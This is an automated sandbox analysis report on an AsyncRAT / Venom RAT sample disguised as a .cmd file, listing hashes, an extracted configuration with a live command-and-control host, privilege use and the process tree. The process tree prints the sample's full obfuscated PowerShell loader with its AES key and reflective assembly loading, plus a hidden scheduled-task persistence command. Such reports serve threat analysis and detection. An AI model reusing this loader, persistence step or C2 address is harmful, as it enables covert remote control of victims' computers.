asyncrat | b3c5e464e43d7db2432f3e28de75bd0eee8fa7a2b7b6fef7134e7115d6681be3

Analysis

max time kernel
146s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
25-03-2024 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$RECYCLE.BIN/$RAH62O0.cmd
Size

111KB
MD5

2c3351c659a42a82e3a3d865c88eaaaf
SHA1

7c73b2c98e449be1c5a85806c08cfe05c0a699ab
SHA256

f8f8f56ff4b52a36a6619ca8eadab3df1ae333dfda870a36b024bd74cf0ce9e4
SHA512

b1962ca896f6328289a61522c6ede86bd0e6436d3dd6ca2170888ee2592a9cf88640f801dd864dbab1713ddb930b4dbed3cba0c5362f56f19150fcdabab599c6
SSDEEP

3072:hXiSJ9Nvg6aGNGIR9Lb5ZQ6gvr+sBKWTP8ydL:hnXy2wg9f5ZezrKWTPdV

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

kdfsv.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral28/memory/1768-134-0x00000182AE080000-0x00000182AE096000-memory.dmp	family_asyncrat

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exe

flow pid process

27 1768 powershell.exe
62 1768 powershell.exe
79 1768 powershell.exe
86 1768 powershell.exe
92 1768 powershell.exe
101 1768 powershell.exe

flow	pid	process
27	1768	powershell.exe
62	1768	powershell.exe
79	1768	powershell.exe
86	1768	powershell.exe
92	1768	powershell.exe
101	1768	powershell.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
228	powershell.exe
228	powershell.exe
4496	powershell.exe
4496	powershell.exe
2148	powershell.exe
2148	powershell.exe
676	powershell.exe
676	powershell.exe
676	powershell.exe
1768	powershell.exe
1768	powershell.exe
1768	powershell.exe
3316	powershell.exe
3316	powershell.exe
3316	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeIncreaseQuotaPrivilege	2148	powershell.exe
Token: SeSecurityPrivilege	2148	powershell.exe
Token: SeTakeOwnershipPrivilege	2148	powershell.exe
Token: SeLoadDriverPrivilege	2148	powershell.exe
Token: SeSystemProfilePrivilege	2148	powershell.exe
Token: SeSystemtimePrivilege	2148	powershell.exe
Token: SeProfSingleProcessPrivilege	2148	powershell.exe
Token: SeIncBasePriorityPrivilege	2148	powershell.exe
Token: SeCreatePagefilePrivilege	2148	powershell.exe
Token: SeBackupPrivilege	2148	powershell.exe
Token: SeRestorePrivilege	2148	powershell.exe
Token: SeShutdownPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeSystemEnvironmentPrivilege	2148	powershell.exe
Token: SeRemoteShutdownPrivilege	2148	powershell.exe
Token: SeUndockPrivilege	2148	powershell.exe
Token: SeManageVolumePrivilege	2148	powershell.exe
Token: 33	2148	powershell.exe
Token: 34	2148	powershell.exe
Token: 35	2148	powershell.exe
Token: 36	2148	powershell.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeIncreaseQuotaPrivilege	676	powershell.exe
Token: SeSecurityPrivilege	676	powershell.exe
Token: SeTakeOwnershipPrivilege	676	powershell.exe
Token: SeLoadDriverPrivilege	676	powershell.exe
Token: SeSystemProfilePrivilege	676	powershell.exe
Token: SeSystemtimePrivilege	676	powershell.exe
Token: SeProfSingleProcessPrivilege	676	powershell.exe
Token: SeIncBasePriorityPrivilege	676	powershell.exe
Token: SeCreatePagefilePrivilege	676	powershell.exe
Token: SeBackupPrivilege	676	powershell.exe
Token: SeRestorePrivilege	676	powershell.exe
Token: SeShutdownPrivilege	676	powershell.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeSystemEnvironmentPrivilege	676	powershell.exe
Token: SeRemoteShutdownPrivilege	676	powershell.exe
Token: SeUndockPrivilege	676	powershell.exe
Token: SeManageVolumePrivilege	676	powershell.exe
Token: 33	676	powershell.exe
Token: 34	676	powershell.exe
Token: 35	676	powershell.exe
Token: 36	676	powershell.exe
Token: SeIncreaseQuotaPrivilege	676	powershell.exe
Token: SeSecurityPrivilege	676	powershell.exe
Token: SeTakeOwnershipPrivilege	676	powershell.exe
Token: SeLoadDriverPrivilege	676	powershell.exe
Token: SeSystemProfilePrivilege	676	powershell.exe
Token: SeSystemtimePrivilege	676	powershell.exe
Token: SeProfSingleProcessPrivilege	676	powershell.exe
Token: SeIncBasePriorityPrivilege	676	powershell.exe
Token: SeCreatePagefilePrivilege	676	powershell.exe
Token: SeBackupPrivilege	676	powershell.exe
Token: SeRestorePrivilege	676	powershell.exe
Token: SeShutdownPrivilege	676	powershell.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeSystemEnvironmentPrivilege	676	powershell.exe
Token: SeRemoteShutdownPrivilege	676	powershell.exe
Token: SeUndockPrivilege	676	powershell.exe
Token: SeManageVolumePrivilege	676	powershell.exe
Token: 33	676	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 2268 wrote to memory of 3096	2268	cmd.exe	cmd.exe
PID 2268 wrote to memory of 3096	2268	cmd.exe	cmd.exe
PID 2268 wrote to memory of 2888	2268	cmd.exe	cmd.exe
PID 2268 wrote to memory of 2888	2268	cmd.exe	cmd.exe
PID 2888 wrote to memory of 3624	2888	cmd.exe	cmd.exe
PID 2888 wrote to memory of 3624	2888	cmd.exe	cmd.exe
PID 2888 wrote to memory of 2344	2888	cmd.exe	cmd.exe
PID 2888 wrote to memory of 2344	2888	cmd.exe	cmd.exe
PID 2888 wrote to memory of 228	2888	cmd.exe	powershell.exe
PID 2888 wrote to memory of 228	2888	cmd.exe	powershell.exe
PID 228 wrote to memory of 4496	228	powershell.exe	powershell.exe
PID 228 wrote to memory of 4496	228	powershell.exe	powershell.exe
PID 228 wrote to memory of 2148	228	powershell.exe	powershell.exe
PID 228 wrote to memory of 2148	228	powershell.exe	powershell.exe
PID 228 wrote to memory of 676	228	powershell.exe	powershell.exe
PID 228 wrote to memory of 676	228	powershell.exe	powershell.exe
PID 228 wrote to memory of 1292	228	powershell.exe	cmd.exe
PID 228 wrote to memory of 1292	228	powershell.exe	cmd.exe
PID 1292 wrote to memory of 232	1292	cmd.exe	cmd.exe
PID 1292 wrote to memory of 232	1292	cmd.exe	cmd.exe
PID 232 wrote to memory of 4880	232	cmd.exe	cmd.exe
PID 232 wrote to memory of 4880	232	cmd.exe	cmd.exe
PID 232 wrote to memory of 1912	232	cmd.exe	cmd.exe
PID 232 wrote to memory of 1912	232	cmd.exe	cmd.exe
PID 232 wrote to memory of 1768	232	cmd.exe	powershell.exe
PID 232 wrote to memory of 1768	232	cmd.exe	powershell.exe
PID 1768 wrote to memory of 3316	1768	powershell.exe	powershell.exe
PID 1768 wrote to memory of 3316	1768	powershell.exe	powershell.exe
PID 1768 wrote to memory of 3696	1768	powershell.exe	powershell.exe
PID 1768 wrote to memory of 3696	1768	powershell.exe	powershell.exe
PID 1768 wrote to memory of 1836	1768	powershell.exe	powershell.exe
PID 1768 wrote to memory of 1836	1768	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
2⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
3⤵
PID:3624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd';$vPfm='FrBUtpomBUtpBaBUtpseBUtp6BUtp4SBUtptBUtpriBUtpnBUtpgBUtp'.Replace('BUtp', ''),'SplJBtgiJBtgtJBtg'.Replace('JBtg', ''),'GethEjOChEjOuhEjOrrhEjOenhEjOtPhEjOrhEjOochEjOehEjOsshEjO'.Replace('hEjO', ''),'RbMNueabMNudLibMNunbMNuebMNusbMNu'.Replace('bMNu', ''),'TrVMsDanVMsDsfVMsDoVMsDrVMsDmVMsDFiVMsDnalVMsDBlVMsDoVMsDckVMsD'.Replace('VMsD', ''),'CwuCwrewuCwatwuCwewuCwDecwuCwrypwuCwtowuCwrwuCw'.Replace('wuCw', ''),'MaiTiHmnMoTiHmdTiHmuleTiHm'.Replace('TiHm', ''),'EnUWistrUWisyPUWisoinUWistUWis'.Replace('UWis', ''),'LookWIadokWI'.Replace('okWI', ''),'COhAHhOhAHanOhAHgeOhAHExOhAHteOhAHnsOhAHionOhAH'.Replace('OhAH', ''),'DeczWTeomzWTepzWTerzWTeezWTesszWTe'.Replace('zWTe', ''),'CokibSpkibSyTkibSokibS'.Replace('kibS', ''),'InwjkRvwjkRowjkRkewjkR'.Replace('wjkR', ''),'ElONUdeONUdmeONUdntONUdAtONUd'.Replace('ONUd', '');powershell -w hidden;function eQHuL($xDKNl){$wfVuI=[System.Security.Cryptography.Aes]::Create();$wfVuI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wfVuI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wfVuI.Key=[System.Convert]::($vPfm[0])('smeuwWzR6dWlk5l0XRDHt/STkUE6r93X9fZoZ+Y3e4g=');$wfVuI.IV=[System.Convert]::($vPfm[0])('u1EcqhG41JNBknlWNKXGVQ==');$oHOle=$wfVuI.($vPfm[5])();$HZbjq=$oHOle.($vPfm[4])($xDKNl,0,$xDKNl.Length);$oHOle.Dispose();$wfVuI.Dispose();$HZbjq;}function Jvwqe($xDKNl){$rttxe=New-Object System.IO.MemoryStream(,$xDKNl);$KtnaD=New-Object System.IO.MemoryStream;$fHrHd=New-Object System.IO.Compression.GZipStream($rttxe,[IO.Compression.CompressionMode]::($vPfm[10]));$fHrHd.($vPfm[11])($KtnaD);$fHrHd.Dispose();$rttxe.Dispose();$KtnaD.Dispose();$KtnaD.ToArray();}$AGaOg=[System.IO.File]::($vPfm[3])([Console]::Title);$bRtGG=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 5).Substring(2))));$HvxJi=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 6).Substring(2))));[System.Reflection.Assembly]::($vPfm[8])([byte[]]$HvxJi).($vPfm[7]).($vPfm[12])($null,$null);[System.Reflection.Assembly]::($vPfm[8])([byte[]]$bRtGG).($vPfm[7]).($vPfm[12])($null,$null); "
3⤵
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 58579' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
4⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
5⤵
- Suspicious use of WriteProcessMemory
PID:232

C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
6⤵
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';$vPfm='FrBUtpomBUtpBaBUtpseBUtp6BUtp4SBUtptBUtpriBUtpnBUtpgBUtp'.Replace('BUtp', ''),'SplJBtgiJBtgtJBtg'.Replace('JBtg', ''),'GethEjOChEjOuhEjOrrhEjOenhEjOtPhEjOrhEjOochEjOehEjOsshEjO'.Replace('hEjO', ''),'RbMNueabMNudLibMNunbMNuebMNusbMNu'.Replace('bMNu', ''),'TrVMsDanVMsDsfVMsDoVMsDrVMsDmVMsDFiVMsDnalVMsDBlVMsDoVMsDckVMsD'.Replace('VMsD', ''),'CwuCwrewuCwatwuCwewuCwDecwuCwrypwuCwtowuCwrwuCw'.Replace('wuCw', ''),'MaiTiHmnMoTiHmdTiHmuleTiHm'.Replace('TiHm', ''),'EnUWistrUWisyPUWisoinUWistUWis'.Replace('UWis', ''),'LookWIadokWI'.Replace('okWI', ''),'COhAHhOhAHanOhAHgeOhAHExOhAHteOhAHnsOhAHionOhAH'.Replace('OhAH', ''),'DeczWTeomzWTepzWTerzWTeezWTesszWTe'.Replace('zWTe', ''),'CokibSpkibSyTkibSokibS'.Replace('kibS', ''),'InwjkRvwjkRowjkRkewjkR'.Replace('wjkR', ''),'ElONUdeONUdmeONUdntONUdAtONUd'.Replace('ONUd', '');powershell -w hidden;function eQHuL($xDKNl){$wfVuI=[System.Security.Cryptography.Aes]::Create();$wfVuI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wfVuI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wfVuI.Key=[System.Convert]::($vPfm[0])('smeuwWzR6dWlk5l0XRDHt/STkUE6r93X9fZoZ+Y3e4g=');$wfVuI.IV=[System.Convert]::($vPfm[0])('u1EcqhG41JNBknlWNKXGVQ==');$oHOle=$wfVuI.($vPfm[5])();$HZbjq=$oHOle.($vPfm[4])($xDKNl,0,$xDKNl.Length);$oHOle.Dispose();$wfVuI.Dispose();$HZbjq;}function Jvwqe($xDKNl){$rttxe=New-Object System.IO.MemoryStream(,$xDKNl);$KtnaD=New-Object System.IO.MemoryStream;$fHrHd=New-Object System.IO.Compression.GZipStream($rttxe,[IO.Compression.CompressionMode]::($vPfm[10]));$fHrHd.($vPfm[11])($KtnaD);$fHrHd.Dispose();$rttxe.Dispose();$KtnaD.Dispose();$KtnaD.ToArray();}$AGaOg=[System.IO.File]::($vPfm[3])([Console]::Title);$bRtGG=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 5).Substring(2))));$HvxJi=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 6).Substring(2))));[System.Reflection.Assembly]::($vPfm[8])([byte[]]$HvxJi).($vPfm[7]).($vPfm[12])($null,$null);[System.Reflection.Assembly]::($vPfm[8])([byte[]]$bRtGG).($vPfm[7]).($vPfm[12])($null,$null); "
6⤵
PID:1912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 58579' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1836

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
56e75e6c1c60bdb7f1de0004fa00954f

SHA1
e3985821b5498f9a8491d35a55d77d014945cced

SHA256
8d7e68095c1769a865c3afa32f66860669d5d8e092ade4d181196c6967e933f0

SHA512
de61133365633849372cecbb8bf513a3671b1ac6b634c8fba931257d3e1bdcdb1ec9a7110429c9b6617898066df31d56f3a28b508a823f4c22744b198382f65f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9d662ecae338ca923a784422a86e9925

SHA1
ccdbbd6f3a1801b13f503d92f5d48fe5041ab495

SHA256
af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e

SHA512
5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c118e29489863b7d5859e4e697842329

SHA1
ede543c75580fa7caba7d21f42d674248e3c0885

SHA256
22d4ec09704d261479cf9521f93ba4840fbe93601f69fb2dd71e6c936dcae091

SHA512
868ba879e1a4e5c43824abd70b29ac97a8153b8f9dc49b8d378ca465715ab1833d3d87ba5a0eb4eb7543b5d8cc561946441626e25c0c60afb90bea020113ed44

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_avwdcxkp.4dg.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\strt.cmd
Filesize
111KB

MD5
2c3351c659a42a82e3a3d865c88eaaaf

SHA1
7c73b2c98e449be1c5a85806c08cfe05c0a699ab

SHA256
f8f8f56ff4b52a36a6619ca8eadab3df1ae333dfda870a36b024bd74cf0ce9e4

SHA512
b1962ca896f6328289a61522c6ede86bd0e6436d3dd6ca2170888ee2592a9cf88640f801dd864dbab1713ddb930b4dbed3cba0c5362f56f19150fcdabab599c6

Download Submit
memory/228-32-0x00007FFD14970000-0x00007FFD14A2E000-memory.dmp

Filesize
760KB

Download
memory/228-14-0x000001DE58EB0000-0x000001DE58F26000-memory.dmp

Filesize
472KB

Download
memory/228-98-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/228-11-0x000001DE586F0000-0x000001DE58700000-memory.dmp

Filesize
64KB

Download
memory/228-30-0x000001DE586E0000-0x000001DE586F4000-memory.dmp

Filesize
80KB

Download
memory/228-31-0x00007FFD15550000-0x00007FFD15745000-memory.dmp

Filesize
2.0MB

Download
memory/228-0-0x000001DE586B0000-0x000001DE586D2000-memory.dmp

Filesize
136KB

Download
memory/228-33-0x000001DE58A00000-0x000001DE58A10000-memory.dmp

Filesize
64KB

Download
memory/228-10-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/228-77-0x000001DE586F0000-0x000001DE58700000-memory.dmp

Filesize
64KB

Download
memory/228-70-0x000001DE586F0000-0x000001DE58700000-memory.dmp

Filesize
64KB

Download
memory/228-12-0x000001DE586F0000-0x000001DE58700000-memory.dmp

Filesize
64KB

Download
memory/228-13-0x000001DE58DE0000-0x000001DE58E24000-memory.dmp

Filesize
272KB

Download
memory/228-63-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/676-51-0x00000239D3A90000-0x00000239D3AA0000-memory.dmp

Filesize
64KB

Download
memory/676-65-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/676-59-0x00000239D3A90000-0x00000239D3AA0000-memory.dmp

Filesize
64KB

Download
memory/676-50-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/1768-76-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/1768-135-0x00007FFD15550000-0x00007FFD15745000-memory.dmp

Filesize
2.0MB

Download
memory/1768-99-0x00000182AD810000-0x00000182AD824000-memory.dmp

Filesize
80KB

Download
memory/1768-130-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/1768-137-0x00007FFD15550000-0x00007FFD15745000-memory.dmp

Filesize
2.0MB

Download
memory/1768-101-0x00007FFD14970000-0x00007FFD14A2E000-memory.dmp

Filesize
760KB

Download
memory/1768-100-0x00007FFD15550000-0x00007FFD15745000-memory.dmp

Filesize
2.0MB

Download
memory/1768-82-0x0000018294C80000-0x0000018294C90000-memory.dmp

Filesize
64KB

Download
memory/1768-134-0x00000182AE080000-0x00000182AE096000-memory.dmp

Filesize
88KB

Download
memory/1836-128-0x00000242DD510000-0x00000242DD520000-memory.dmp

Filesize
64KB

Download
memory/1836-126-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/1836-133-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/1836-131-0x00000242DD510000-0x00000242DD520000-memory.dmp

Filesize
64KB

Download
memory/1836-129-0x00000242DD510000-0x00000242DD520000-memory.dmp

Filesize
64KB

Download
memory/2148-49-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/2148-47-0x000002346F0D0000-0x000002346F0E0000-memory.dmp

Filesize
64KB

Download
memory/2148-35-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/2148-36-0x000002346F0D0000-0x000002346F0E0000-memory.dmp

Filesize
64KB

Download
memory/2148-46-0x000002346F0D0000-0x000002346F0E0000-memory.dmp

Filesize
64KB

Download
memory/3316-94-0x000001DE3D050000-0x000001DE3D060000-memory.dmp

Filesize
64KB

Download
memory/3316-97-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/3316-95-0x000001DE3D050000-0x000001DE3D060000-memory.dmp

Filesize
64KB

Download
memory/3316-93-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/3696-114-0x000001A400410000-0x000001A400420000-memory.dmp

Filesize
64KB

Download
memory/3696-116-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/3696-112-0x000001A400410000-0x000001A400420000-memory.dmp

Filesize
64KB

Download
memory/3696-102-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/4496-15-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/4496-21-0x000002D377490000-0x000002D3774A0000-memory.dmp

Filesize
64KB

Download
memory/4496-29-0x00007FFCF75A0000-0x00007FFCF8061000-memory.dmp

Filesize
10.8MB

Download
memory/4496-22-0x000002D377490000-0x000002D3774A0000-memory.dmp

Filesize
64KB

Download